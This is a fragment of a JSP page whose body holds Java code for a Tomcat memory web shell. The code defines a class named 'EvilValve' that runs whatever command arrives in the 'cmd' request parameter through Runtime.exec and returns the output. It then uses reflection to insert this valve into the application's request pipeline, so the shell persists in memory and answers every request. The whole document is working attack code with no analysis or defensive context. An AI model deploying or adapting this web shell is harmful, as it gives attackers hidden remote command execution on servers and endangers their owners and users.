</head>
<body>
<%
  class EvilValve extends ValveBase{
    @Override
    public void invoke(Request request, Response response) throws IOException, ServletException {
      String cmd = request.getParameter("cmd");
      InputStream inputStream = Runtime.getRuntime().exec(cmd).getInputStream();
      InputStreamReader inputStreamReader = new InputStreamReader(inputStream);
      BufferedReader bufferedReader = new BufferedReader(inputStreamReader);
      String res = "";
      String line = bufferedReader.readLine();
      while(line != null){
        res = res + line + '\n';
        line = bufferedReader.readLine();
      }
      response.getWriter().write(res);
    }
  }
  EvilValve evilValve = new EvilValve();
  Field reqfield = request.getClass().getDeclaredField("request");
  reqfield.setAccessible(true);
  Request req = (Request) reqfield.get(request);
  Pipeline pipeline = req.getContext().getPipeline();
  pipeline.addValve(evilValve);
%>
</body>
</html>